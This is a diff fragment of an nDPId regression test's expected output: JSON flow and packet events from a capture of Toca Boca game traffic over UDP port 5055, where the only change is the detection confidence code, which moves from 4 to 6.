00652{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":51,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1649357796478,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":201,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":201,"pkt_l4_len":167,"thread_ts_msec":1649357796478,"pkt":"eJS0JASgYDjgxTWgCABFAAC76dUAAD8RIQ7AqAJkW8dRe5FiE78Ap9\/gQYIAAwAAEKFwWW0qAQAAAAAAABQAAAAAAAAAAYraGScGAAEEAAAAcwAAAALzBgABAUNgqO2TCWkNPwQmb\/To5eafmHwk2M3jcXw+syR8\/2ZkLpAnxsjBo9NJIRg3niLIEBe1BKRcjcw9VsSC9Wp8xiV3ZwLnTCAQMR7QxRv8JFOFvJff26sic0VghOwZl+0g5UdBDP8BBAAAAAwAAAAC"} -00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":51,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649357796478,"flow_last_seen":1649357796478,"flow_idle_time":200000,"flow_min_l4_payload_len":159,"flow_max_l4_payload_len":159,"flow_tot_l4_payload_len":159,"flow_avg_l4_payload_len":159,"midstream":0,"thread_ts_msec":1649357796478,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"91.199.81.123","src_port":37218,"dst_port":5055,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"TocaBoca","breed":"Fun","category":"Game"}} 
+00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":51,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649357796478,"flow_last_seen":1649357796478,"flow_idle_time":200000,"flow_min_l4_payload_len":159,"flow_max_l4_payload_len":159,"flow_tot_l4_payload_len":159,"flow_avg_l4_payload_len":159,"midstream":0,"thread_ts_msec":1649357796478,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"91.199.81.123","src_port":37218,"dst_port":5055,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"TocaBoca","breed":"Fun","category":"Game"}} 00556{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":52,"source":"toca-boca.pcap","alias":"nDPId-test","packets-captured":52,"packets-processed":51,"total-skipped-flows":0,"total-l4-payload-len":6173,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":9,"total-detection-updates":0,"total-updates":0,"current-active-flows":2,"total-active-flows":9,"total-idle-flows":7,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":46,"global_ts_msec":1649358122834} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":52,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649358122834,"flow_last_seen":1649358122834,"flow_idle_time":200000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":1649358122834,"l3_proto":"ip4","src_ip":"91.199.81.123","dst_ip":"192.168.2.100","src_port":5055,"dst_port":33311,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00642{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":52,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1649358122834,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":192,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":192,"pkt_l4_len":158,"thread_ts_msec":1649358122834,"pkt":"YDjgxTWgeJS0JASgCABFAACyLPAAADsR4fxbx1F7wKgCZBO\/gh8AnmVJAAAAAorfFD0zMIisAQAAAAAAABQAAAAAAAAAAgAAAG4GAAEAAAAAdgAAAALzBwAAAAgBAUNg8vSS5O+J\/XjOQQuCE\/Kz82hilWidCgaS8LTWICvsbjJnfEWbmMIZg+HqoUshflWYbYRWr5V8d81p2Yo8Hq57m1zea2a8m\/5YufPz7tt8hhSQ3WPzZMeBz21Wv8GmKuYQ"} -00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":52,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649358122834,"flow_last_seen":1649358122834,"flow_idle_time":200000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":1649358122834,"l3_proto":"ip4","src_ip":"91.199.81.123","dst_ip":"192.168.2.100","src_port":5055,"dst_port":33311,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"TocaBoca","breed":"Fun","category":"Game"}} -00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":53,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1649357623776,"flow_last_seen":1649357623776,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1649358122834,"l3_proto":"ip4","src_ip":"91.199.81.123","dst_ip":"192.168.2.100","src_port":5055,"dst_port":60837,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TocaBoca","breed":"Fun","category":"Game"}} 
-00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":53,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1649357796478,"flow_last_seen":1649357796478,"flow_idle_time":200000,"flow_min_l4_payload_len":159,"flow_max_l4_payload_len":159,"flow_tot_l4_payload_len":159,"flow_avg_l4_payload_len":159,"midstream":0,"thread_ts_msec":1649358122834,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"91.199.81.123","src_port":37218,"dst_port":5055,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TocaBoca","breed":"Fun","category":"Game"}} +00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":52,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649358122834,"flow_last_seen":1649358122834,"flow_idle_time":200000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":1649358122834,"l3_proto":"ip4","src_ip":"91.199.81.123","dst_ip":"192.168.2.100","src_port":5055,"dst_port":33311,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"TocaBoca","breed":"Fun","category":"Game"}} +00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":53,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1649357623776,"flow_last_seen":1649357623776,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1649358122834,"l3_proto":"ip4","src_ip":"91.199.81.123","dst_ip":"192.168.2.100","src_port":5055,"dst_port":60837,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"TocaBoca","breed":"Fun","category":"Game"}} +00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":53,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1649357796478,"flow_last_seen":1649357796478,"flow_idle_time":200000,"flow_min_l4_payload_len":159,"flow_max_l4_payload_len":159,"flow_tot_l4_payload_len":159,"flow_avg_l4_payload_len":159,"midstream":0,"thread_ts_msec":1649358122834,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"91.199.81.123","src_port":37218,"dst_port":5055,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TocaBoca","breed":"Fun","category":"Game"}} 00558{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":53,"source":"toca-boca.pcap","alias":"nDPId-test","packets-captured":53,"packets-processed":52,"total-skipped-flows":0,"total-l4-payload-len":6323,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":10,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":10,"total-idle-flows":9,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":52,"global_ts_msec":1649360879587} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":53,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649360879587,"flow_last_seen":1649360879587,"flow_idle_time":200000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":1649360879587,"l3_proto":"ip4","src_ip":"91.199.81.123","dst_ip":"192.168.2.100","src_port":5055,"dst_port":40290,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00641{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":53,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1649360879587,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":192,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":192,"pkt_l4_len":158,"thread_ts_msec":1649360879587,"pkt":"YDjgxTWgeJS0JASgCABFAACykLMAADsRfjlbx1F7wKgCZBO\/nWIAnpDwAAAAAosJJVgh87CXAQAAAAAAABQAAAAAAAAAAgAAAn4GAAEAAAAAdgAAAALzBwAAAAgBAUNgLNWb5SaCJAocJvmSqainbl+Oa4DJn3IT4qVSI8qFj6X5DLzbYJpCJ8LrRJdeJ7QpAQUlDLFkzmCIsWSJViCx2U\/siT702DkXpm6dZLrYzkK0dSx2ekQBCbW\/YHJC1uBB"} -00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":53,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649360879587,"flow_last_seen":1649360879587,"flow_idle_time":200000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":1649360879587,"l3_proto":"ip4","src_ip":"91.199.81.123","dst_ip":"192.168.2.100","src_port":5055,"dst_port":40290,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"TocaBoca","breed":"Fun","category":"Game"}} -00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":54,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1649358122834,"flow_last_seen":1649358122834,"flow_idle_time":200000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":1649360879587,"l3_proto":"ip4","src_ip":"91.199.81.123","dst_ip":"192.168.2.100","src_port":5055,"dst_port":33311,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TocaBoca","breed":"Fun","category":"Game"}} 
+00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":53,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649360879587,"flow_last_seen":1649360879587,"flow_idle_time":200000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":1649360879587,"l3_proto":"ip4","src_ip":"91.199.81.123","dst_ip":"192.168.2.100","src_port":5055,"dst_port":40290,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"TocaBoca","breed":"Fun","category":"Game"}} +00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":54,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1649358122834,"flow_last_seen":1649358122834,"flow_idle_time":200000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":1649360879587,"l3_proto":"ip4","src_ip":"91.199.81.123","dst_ip":"192.168.2.100","src_port":5055,"dst_port":33311,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TocaBoca","breed":"Fun","category":"Game"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":54,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649361130862,"flow_last_seen":1649361130862,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1649361130862,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"91.199.81.123","src_port":33024,"dst_port":5055,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":54,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1649361130862,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1649361130862,"pkt":"eJS0JASgYDjgxTWgCABFAAA8CW8AAD8RAfTAqAJkW8dRe4EAE78AKIZgFuYAAQAANV9LWFVQAf8AAAAAABQAAAAAAAAAAosM+h4="} -00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":54,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649361130862,"flow_last_seen":1649361130862,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1649361130862,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"91.199.81.123","src_port":33024,"dst_port":5055,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"TocaBoca","breed":"Fun","category":"Game"}} -00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":55,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1649360879587,"flow_last_seen":1649360879587,"flow_idle_time":200000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":1649361130862,"l3_proto":"ip4","src_ip":"91.199.81.123","dst_ip":"192.168.2.100","src_port":5055,"dst_port":40290,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TocaBoca","breed":"Fun","category":"Game"}} 
+00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":54,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649361130862,"flow_last_seen":1649361130862,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1649361130862,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"91.199.81.123","src_port":33024,"dst_port":5055,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"TocaBoca","breed":"Fun","category":"Game"}} +00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":55,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1649360879587,"flow_last_seen":1649360879587,"flow_idle_time":200000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":1649361130862,"l3_proto":"ip4","src_ip":"91.199.81.123","dst_ip":"192.168.2.100","src_port":5055,"dst_port":40290,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TocaBoca","breed":"Fun","category":"Game"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":55,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649361166006,"flow_last_seen":1649361166006,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1649361166006,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"91.199.81.123","src_port":56864,"dst_port":5055,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":55,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1649361166006,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1649361166006,"pkt":"eJS0JASgYDjgxTWgCABFAAA8JwkAAD8R5FnAqAJkW8dRe94gE78AKB4+Pk0AAQAADyI7JuZnAQAAAAAAABQAAAAAAAAAA4sNhA4="} -00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":55,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649361166006,"flow_last_seen":1649361166006,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1649361166006,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"91.199.81.123","src_port":56864,"dst_port":5055,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"TocaBoca","breed":"Fun","category":"Game"}} +00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":55,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649361166006,"flow_last_seen":1649361166006,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1649361166006,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"91.199.81.123","src_port":56864,"dst_port":5055,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"TocaBoca","breed":"Fun","category":"Game"}} 
00559{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":56,"source":"toca-boca.pcap","alias":"nDPId-test","packets-captured":56,"packets-processed":55,"total-skipped-flows":0,"total-l4-payload-len":6537,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":13,"total-detection-updates":0,"total-updates":0,"current-active-flows":2,"total-active-flows":13,"total-idle-flows":11,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":64,"global_ts_msec":1649411629031} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":56,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649411629031,"flow_last_seen":1649411629031,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1649411629031,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"91.199.81.123","src_port":50600,"dst_port":5055,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":56,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1649411629031,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1649411629031,"pkt":"eJS0JASgYDjgxTWgCABFAAA8d50AAD8Rk8XAqAJkW8dRe8WoE78AKHeQB0IAAQAAAiMEvRHkAQAAAAAAABQAAAAAAAAAA44Pjyk="} 
-00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":56,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649411629031,"flow_last_seen":1649411629031,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1649411629031,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"91.199.81.123","src_port":50600,"dst_port":5055,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"TocaBoca","breed":"Fun","category":"Game"}} -00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":57,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1649361166006,"flow_last_seen":1649361166006,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1649411629031,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"91.199.81.123","src_port":56864,"dst_port":5055,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TocaBoca","breed":"Fun","category":"Game"}} -00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":57,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1649361130862,"flow_last_seen":1649361130862,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1649411629031,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"91.199.81.123","src_port":33024,"dst_port":5055,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"TocaBoca","breed":"Fun","category":"Game"}} +00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":56,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649411629031,"flow_last_seen":1649411629031,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1649411629031,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"91.199.81.123","src_port":50600,"dst_port":5055,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"TocaBoca","breed":"Fun","category":"Game"}} +00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":57,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1649361166006,"flow_last_seen":1649361166006,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1649411629031,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"91.199.81.123","src_port":56864,"dst_port":5055,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TocaBoca","breed":"Fun","category":"Game"}} +00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":57,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1649361130862,"flow_last_seen":1649361130862,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1649411629031,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"91.199.81.123","src_port":33024,"dst_port":5055,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"6":"DPI"},"proto":"TocaBoca","breed":"Fun","category":"Game"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":57,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649411716027,"flow_last_seen":1649411716027,"flow_idle_time":200000,"flow_min_l4_payload_len":56,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1649411716027,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"91.199.81.123","src_port":35671,"dst_port":5055,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00513{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":57,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1649411716027,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":98,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":98,"pkt_l4_len":64,"thread_ts_msec":1649411716027,"pkt":"eJS0JASgYDjgxTWgCABFAABUunoAAD8RUNDAqAJkW8dRe4tXE78AQP8+\/\/8AAQAAC5da0+3vAv8BBAAAACwAAAABAAAEsAAAgAAAAAACAAAAAAAAAAAAABOIAAAAAgAAAAI="} -00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":57,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649411716027,"flow_last_seen":1649411716027,"flow_idle_time":200000,"flow_min_l4_payload_len":56,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1649411716027,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"91.199.81.123","src_port":35671,"dst_port":5055,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"TocaBoca","breed":"Fun","category":"Game"}} 
+00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":57,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649411716027,"flow_last_seen":1649411716027,"flow_idle_time":200000,"flow_min_l4_payload_len":56,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1649411716027,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"91.199.81.123","src_port":35671,"dst_port":5055,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"TocaBoca","breed":"Fun","category":"Game"}} 00543{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":58,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1649411716065,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":118,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":118,"pkt_l4_len":84,"thread_ts_msec":1649411716065,"pkt":"YDjgxTWgeJS0JASgCABFAABoQ8IAADsRy3Rbx1F7wKgCZBO\/i1cAVB6VAAAAAo4Q4z9a0+3vAf8AAAAAABQAAAAAAAAAAQAAC5cD\/wEAAAAALAAAAABsIQSwAACAAAAAAAIAAAAAAAAAAAAAE4gAAAACAAAAAg=="} 